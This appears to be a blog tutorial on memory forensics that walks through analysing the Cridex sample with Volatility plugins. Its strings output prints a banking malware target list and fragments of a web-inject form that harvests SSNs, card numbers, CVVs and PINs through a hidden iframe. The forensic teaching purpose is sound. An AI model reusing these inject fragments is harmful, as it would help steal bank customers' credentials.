Hello learners, in the first part of our tutorial we learnt how to obtain a volatility memory dump from a computer which either maybe the victim computer or the computer used to launch an attack. From the acquired memory dump, an investigator can be able to determine the processes that were running on the computer hence he/she can also be able to come up with solid evidence which can be used against the suspects involved in a law suit. In this guide, we will be doing a digital forensic analysis on a volatility memory dump.
Requirements
- Have the memory dump to perform analysis on. (You can get a memory dump from volatility github repo).
- Have Kali Linux operating system.
- Have volatility forensic framework installed.
- Have knowledge on digital forensic analysis.
- Have python installed.
With that let’s jump right into our guide.
Installing volatility memory forensic tool.
Step 1: Download volatility from the github repo
Installing volatility memory forensic tool is just as easy as getting a tool from their official github repo. The framework is built with python. You can download it using the below command.
git clone https://github.com/volatilityfoundation/volatility.git
Step 2: Running volatility.
After the installation is complete. You can just navigate to the volatility folder and run it directly using the command to check the different options available.
python vol.py -h
When trying to run volatility for the first time, I ran into errors as shown in the picture below which you may also run into. You can check for the solution on this post.
Having installed volatility and fixed any errors. We can now dive into forensic volatility memory analysis.
Forensic memory analysis using volatility
Step 1: Getting memory dump OS profile
Dump analysis helps us know the OS profile. We add -f to specify the file which in our case is the memdump and also specify the plugin required. We cannot start the investigation without knowing the OS profile.
$python2 volatility.py -f /your-memdump-location imageinfo
As shown on the image below we are able to determine the operating system of the memdump under investigation. We are able to know the PC was running on (WinXPSP2x86)
Step 2:Checking the running processes
The pstree plugin in volatility helps us determine the processes that are running and also shows their parent processes.
As shown on the image, we have a suspicious looking process “reader_sl.exe” which is under the explorer processes. After noting this, we can try check if there are any hidden processes using the psxview plugin. This plugin is useful as it shows all the processes that are running either hidden or not hidden. as shown on the image below we can see that there in hidden process which is running.
Step 3: Checking for open connections and the running sockets on the volatility memory dump
After we are done with checking the running processes, we can check for the sockets that are running and the open connections on the computer. To check this, we will use two plugins; the connscan plugin and the sockets plugin. The sockets plugin will list the open sockets while the connscan plugin will check for open TCP connections.
After we check for the TCP connections, we note that process with ID 1484 is connected to a remote address using IP 41.168.5.140 and 125.19.103.198 using port 8080. When we check for open socket using sockets plugin, we can see that process 1484 has an open TCP connection using port 1038.
Step 4: Checking the last commands that were ran
We can now check for commands which were ran on the PC under investigation. Checking commands can help an investigator while he/she gathers evidence from the volatility memory dump. We will be checking out for process 1484.
└─$ python2 vol.py -f /home/toxic/Desktop/cridex.vmem --profile=WinXPSP2x86 cmdline
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
System pid: 4
************************************************************************
smss.exe pid: 368
Command line : \SystemRoot\System32\smss.exe
************************************************************************
csrss.exe pid: 584
Command line : C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
************************************************************************
winlogon.exe pid: 608
Command line : winlogon.exe
************************************************************************
services.exe pid: 652
Command line : C:\WINDOWS\system32\services.exe
************************************************************************
lsass.exe pid: 664
Command line : C:\WINDOWS\system32\lsass.exe
************************************************************************
svchost.exe pid: 824
Command line : C:\WINDOWS\system32\svchost -k DcomLaunch
************************************************************************
svchost.exe pid: 908
Command line : C:\WINDOWS\system32\svchost -k rpcss
************************************************************************
svchost.exe pid: 1004
Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs
************************************************************************
svchost.exe pid: 1056
Command line : C:\WINDOWS\system32\svchost.exe -k NetworkService
************************************************************************
svchost.exe pid: 1220
Command line : C:\WINDOWS\system32\svchost.exe -k LocalService
************************************************************************
explorer.exe pid: 1484
Command line : C:\WINDOWS\Explorer.EXE
************************************************************************
spoolsv.exe pid: 1512
Command line : C:\WINDOWS\system32\spoolsv.exe
************************************************************************
reader_sl.exe pid: 1640
Command line : "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
************************************************************************
alg.exe pid: 788
Command line : C:\WINDOWS\System32\alg.exe
************************************************************************
wuauclt.exe pid: 1136
Command line : "C:\WINDOWS\system32\wuauclt.exe" /RunStoreAsComServer Local\[3ec]SUSDSb81eb56fa3105543beb3109274ef8ec1
************************************************************************
wuauclt.exe pid: 1588
Command line : "C:\WINDOWS\system32\wuauclt.exe"
After running the command we now see the process 1484 is was among one the processes that were running on the PC. Under explorer.exe process there is the “reader_sl.exe”. This is a Adobe classic reader but it is connecting to an external IP address that looks suspicious. We can export the reader_sl.exe from volatility memory for further analysis.
Step 5: Exporting the reader_sl .exe
On this step we will extract the reader_sl.exe from the volatility memory dump to a folder on our PC. From here, we can be able to perform a malware analysis on the reader_sl.exe. To export the file we will be using a different plugin as shown below.
executable.1640.exe
Step 6: Analyzing reader_sl.exe
Having exported the file to be analyzed, we can now analyze it using available tools for malware analysis. How you analyze the file will depend on the kind of information you want to know. So we use the VirusTotal to check if the app is malicious. Image below shows the report generated on VirusTotal check.
The file is flagged as malicious. Alternatively, we can extract the memdump an try to read through it to see if we can find something of interest relating to our investigations. We can export volatility memory dump of the “reader_sl.exe” using command shown below.
After extracting the dump file we can ow open the file to view and try and find out something useful in our investigation using the command.
strings 1640.dmp | less
*treasurypathways.com*
*CorporateAccounts*
*weblink.websterbank.com*
*secure7.onlineaccess1.com*
*trz.tranzact.org*
*onlineaccess1.com*
*secureport.texascapitalbank.com*
*/Authentication/zbf/k/*
*ebc_ebc1961*
*tdbank.com*
*online.ovcb.com*
*ebanking-services.com*
*schwab.com*
*billmelater.com*
*chase.com*
*bankofamerica.com*
*pnc.com*
*suntrust.com*
*wellsfargo.com*
*ibanking-services.com*
*bankonline.umpquabank.com*
*servlet/teller*
*nsbank.com*
*securentry.calbanktrust.com*
*securentry*
*/Common/SignOn/Start.asp*
*telepc.net*
*enterprise2.openbank.com*
*BusinessAppsHome*
*global1.onlinebank.com*
*webexpress*
*/sbuser/*
In another part of the dump, I found the below piece. We can be able to see that the executable file is an information stealing malware. It specifically targets stealing banking information.
</div>
<iframe name='wj1' src='https://onlinebanking.tdbank.com/images/TDBankLogo.gif' width='0' height='0' border='none' frameborder='0'></iframe>
<form name="injectform" action="" method="post" target="wj1">
<input type="hidden" name="SSN1" id="ssn1" />
<input type="hidden" name="SSN2" id="ssn2" />
<input type="hidden" name="SSN3" id="ssn3" />
<input type="hidden" name="MMN" id="mmn" />
<input type="hidden" name="DL" id="dl" />
<input type="hidden" name="DOBMM" id="dob_mm" />
<input type="hidden" name="DOBDD" id="dob_dd" />
<input type="hidden" name="DOBYY" id="dob_yy" />
<input type="hidden" name="TDCARD" id="cc" />
<input type="hidden" name="expdate_mm" id="expdate_mm" />
<input type="hidden" name="expdate_yy" id="expdate_yy" />
<input type="hidden" name="cvv" id="cvv"/>
<input type="hidden" name="TDPIN" id="pin" />
</form>
*secure.accurint.com/app/bps/mai*
<input*name="PASSWORD_UL">
<input type="hidden" name="PASSWORD_NC" id="pass_nc">
<form*onSubmit="return prepared_pwd
login_script.js"></script>
<script type="text/javascript">
function prepared_pwd2() {
var df = document.forms[0];
if (df.PASSWORD.value.length < 1) {
if (document.LOGIN && df.APPLICATION_TYPE.value != 'irb') {
build_alert('Enter Password!','Please Enter your Password to Sign On.');
} else {
alert('Please Enter your Password to Login.');
df.PA
Conclusion
On the above guide, we were able to perform a volatility memory analysis to gather information from a victim computer as it appears in our findings. We were able to discover a malware which has camouflaged as a known process to the user. This is one of the common method used by hackers when stealing information.
Volatility memory analysis is a powerful skill to add to your investigators arsenal. Volatility framework is extensive and helps investigators perform forensic analysis efficiently. The framework is available for the common operating systems.
References
Volatility memory dump samples
Mnemonic PassiveDNS
Cridex writeup
Hybrid-Analysis